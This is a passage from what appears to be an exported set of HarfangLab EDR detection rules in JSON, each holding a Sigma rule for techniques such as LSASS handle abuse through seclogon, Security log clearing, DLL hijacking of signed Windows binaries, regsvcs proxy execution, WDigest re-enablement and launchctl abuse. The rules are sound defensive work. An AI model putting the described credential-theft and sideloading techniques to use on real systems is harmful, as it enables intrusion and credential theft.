PROCESS_CREATE_PROCESS\n - PROCESS_DUP_HANDLE\n CallTrace|contains: 'seclogon.dll'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e249ffec-7cb4-4b9d-97b1-fcfc3d1cd807",
"rule_name": "LSASS Access via Secondary Logon Service",
"rule_description": "Detects process accesses to LSASS with suspicious access rights that involve \"seclogon.dll\" in the call trace.\nThe SecLogon service can be used to obtain a handle to LSASS, allowing attackers to perform credential dumping while potentially evading common detection methods.\nThis technique is implemented by the tool \"MalSeclogon\" for stealthy credential access.\nIt is recommended to investigate the source process attempting to access LSASS, to verify if the access was legitimate, and to check for other attempts at credential theft.\n",
"rule_creation_date": "2024-11-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e25e5360-7f25-4abb-adb0-d51e46f7b3bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627838Z",
"creation_date": "2026-03-23T11:45:34.627839Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627844Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log_no_process.yml",
"content": "title: Windows Security Log Cleared\nid: e25e5360-7f25-4abb-adb0-d51e46f7b3bf\ndescription: |\n Detects the Windows Security audit log being cleared by an unknown process.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2026/01/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n\n # This is handled by the rule b5bd4ea0-bd89-49d6-9867-4f1b6a100c82\n filter_image:\n ProcessImage|contains: '?'\n\n # This is handled by the rule 68dc5935-e8e4-4223-b4ca-abdf6c9864d3\n filter_session:\n user_data.ClientProcessStartKey: '0'\n SessionLogonType: 3\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e25e5360-7f25-4abb-adb0-d51e46f7b3bf",
"rule_name": "Windows Security Log Cleared",
"rule_description": "Detects the Windows Security audit log being cleared by an unknown process.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\n",
"rule_creation_date": "2026-01-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2746f38-ff8c-47d6-89d6-da6edbd50f8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589918Z",
"creation_date": "2026-03-23T11:45:34.589925Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_genvalobj.yml",
"content": "title: DLL Hijacking via genvalobj.exe\nid: e2746f38-ff8c-47d6-89d6-da6edbd50f8b\ndescription: |\n Detects potential Windows DLL Hijacking via genvalobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'genvalobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2746f38-ff8c-47d6-89d6-da6edbd50f8b",
"rule_name": "DLL Hijacking via genvalobj.exe",
"rule_description": "Detects potential Windows DLL Hijacking via genvalobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2e6edbb-248f-4f1e-b801-8d49da4e6072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070559Z",
"creation_date": "2026-03-23T11:45:34.070561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070566Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1218_009_regsvcs_dll_load.yml",
"content": "title: Suspicious Proxy Execution via regsvcs.exe\nid: e2e6edbb-248f-4f1e-b801-8d49da4e6072\ndescription: |\n Detects the execution of the legitimate Regsvcs.exe Windows binary, used to register .NET COM assemblies.\n This may be used by attackers to load their DLL files, since regsvcs then calls the DLL's \\\"RegisterClass\\\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to investigate the DLL that was loaded into the process, as well as to analyze the parent process for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regsvcs\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regsvcs.exe'\n OriginalFileName: 'regsvcs.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n - ' ?:\\windows\\Microsoft.NET\\assembly\\GAC_64\\'\n\n # Microsoft Configuration Manager\n exclusion_mcm:\n - ParentImage:\n - '?:\\SMS\\bin\\x64\\srvboot.exe'\n - '?:\\SMS\\bin\\x64\\rolesetup.exe'\n - '?:\\Microsoft Configuration Manager\\bin\\X64\\rolesetup.exe'\n - '?:\\Microsoft Configuration Manager\\bin\\X64\\srvboot.exe'\n - '?:\\ConfigMgr\\bin\\X64\\srvboot.exe'\n - '?:\\ConfigMgr\\bin\\X64\\rolesetup.exe'\n - '?:\\SCCM\\bin\\X64\\srvboot.exe'\n - '?:\\SCCM\\bin\\X64\\rolesetup.exe'\n - ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_msiexec:\n ParentImage|endswith: '\\msiexec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - 'Global\\MSI0000'\n CommandLine|endswith: 'RegSvcs.exe /bootstrap?' # (/bootstrapu, /bootstrapi)\n\n exclusion_ibm:\n ParentImage|endswith: '\\amqidnet.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'IBM United Kingdom Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2e6edbb-248f-4f1e-b801-8d49da4e6072",
"rule_name": "Suspicious Proxy Execution via regsvcs.exe",
"rule_description": "Detects the execution of the legitimate Regsvcs.exe Windows binary, used to register .NET COM assemblies.\nThis may be used by attackers to load their DLL files, since regsvcs then calls the DLL's \\\"RegisterClass\\\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to investigate the DLL that was loaded into the process, as well as to analyze the parent process for malicious content or actions.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e2eebc54-49b7-4df1-b9f9-68a14a40af77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620558Z",
"creation_date": "2026-03-23T11:45:34.620560Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620564Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_enable_wdigest.yml",
"content": "title: WDigest Authentication Package Enabled\nid: e2eebc54-49b7-4df1-b9f9-68a14a40af77\ndescription: |\n Detects when the WDigest authentication package is re-enabled in the Windows registry.\n WDigest is an authentication package that, when enabled, causes passwords to be stored in cleartext within the LSASS process memory, posing a significant security risk.\n Attackers can exploit this by retrieving cleartext passwords, enabling lateral movement and data exfiltration.\n It is recommended to investigate the source of the registry modification, verify if the enablement is legitimate, and consider disabling WDigest to mitigate the risk of password exposure.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.defense_evasion\n - attack.t1003.001\n - attack.t1112\n - attack.t1078\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential'\n\n filter_empty:\n Details:\n - 'DWORD (0x00000000)'\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e2eebc54-49b7-4df1-b9f9-68a14a40af77",
"rule_name": "WDigest Authentication Package Enabled",
"rule_description": "Detects when the WDigest authentication package is re-enabled in the Windows registry.\nWDigest is an authentication package that, when enabled, causes passwords to be stored in cleartext within the LSASS process memory, posing a significant security risk.\nAttackers can exploit this by retrieving cleartext passwords, enabling lateral movement and data exfiltration.\nIt is recommended to investigate the source of the registry modification, verify if the enablement is legitimate, and consider disabling WDigest to mitigate the risk of password exposure.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e3140523-18e2-4554-8344-2c0ae8a2854c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625614Z",
"creation_date": "2026-03-23T11:45:34.625616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625620Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md",
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1569_001_launchctl_submit.yml",
"content": "title: Arbitrary Application Executed via Launchctl\nid: e3140523-18e2-4554-8344-2c0ae8a2854c\ndescription: |\n Detects the usage of launchctl to execute an arbitrary application via launchd.\n This could be used by an attacker to execute commands and programs as Launch Agents or Launch Daemons to cover their tracks.\n It is recommended to investigate the program executed by launchctl and any malicious actions it could have taken.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2022/08/31\nmodified: 2025/12/22\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Launchctl\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # launchctl submit -l malicious -- /System/Applications/Calculator.app/Contents/MacOS/Calculator\n selection:\n Image: '/bin/launchctl'\n # Catch /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/\n CommandLine|contains|all:\n - 'submit'\n - '-l'\n - '--'\n\n exclusion_harfanglab:\n - ProcessParentImage: '/Library/SystemExtensions/????????-????-????-????-????????????/fr.harfanglab.hurukai.agent.macos.systemextension/Contents/MacOS/fr.harfanglab.hurukai.agent.macos'\n - ProcessGrandparentImage: '/Library/SystemExtensions/????????-????-????-????-????????????/fr.harfanglab.hurukai.agent.macos.systemextension/Contents/MacOS/fr.harfanglab.hurukai.agent.macos'\n\n exclusion_hp:\n ProcessParentImage: '/Library/Printers/hp/Frameworks/HPDeviceMonitoring.framework/Versions/*/Helpers/HP Device Monitor Manager.app/Contents/MacOS/HP Device Monitor Manager'\n\n exclusion_logmein:\n ProcessParentImage: '/private/var/tmp/*/Support-LogMeInRescue.app/Contents/MacOS/Support-LogMeInRescue'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e3140523-18e2-4554-8344-2c0ae8a2854c",
"rule_name": "Arbitrary Application Executed via Launchctl",
"rule_description": "Detects the usage of launchctl to execute an arbitrary application via launchd.\nThis could be used by an attacker to execute commands and programs as Launch Agents or Launch Daemons to cover their tracks.\nIt is recommended to investigate the program executed by launchctl and any malicious actions it could have taken.\n",
"rule_creation_date": "2022-08-31",
"rule_modified_date": "2025-12-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e33510cf-8461-47e8-bf1b-b41d65212be7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088784Z",
"creation_date": "2026-03-23T11:45:34.088786Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tapiunattend.yml",
"content": "title: DLL Hijacking via tapiunattend.exe\nid: e33510cf-8461-47e8-bf1b-b41d65212be7\ndescription: |\n Detects potential Windows DLL Hijacking via tapiunattend.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tapiunattend.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e33510cf-8461-47e8-bf1b-b41d65212be7",
"rule_name": "DLL Hijacking via tapiunattend.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tapiunattend.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e33f1e79-2e97-4b0b-a502-044f0da8a201",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097724Z",
"creation_date": "2026-03-23T11:45:34.097726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dnscmd.yml",
"content": "title: DLL Hijacking via dnscmd.exe\nid: e33f1e79-2e97-4b0b-a502-044f0da8a201\ndescription: |\n Detects potential Windows DLL Hijacking via dnscmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscmd.exe'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\ncrypt.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e33f1e79-2e97-4b0b-a502-044f0da8a201",
"rule_name": "DLL Hijacking via dnscmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dnscmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e344342c-978e-4bf2-b1b3-d96d716b5363",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075012Z",
"creation_date": "2026-03-23T11:45:34.075015Z",
"enabled": true,
"hl_status": "stable",
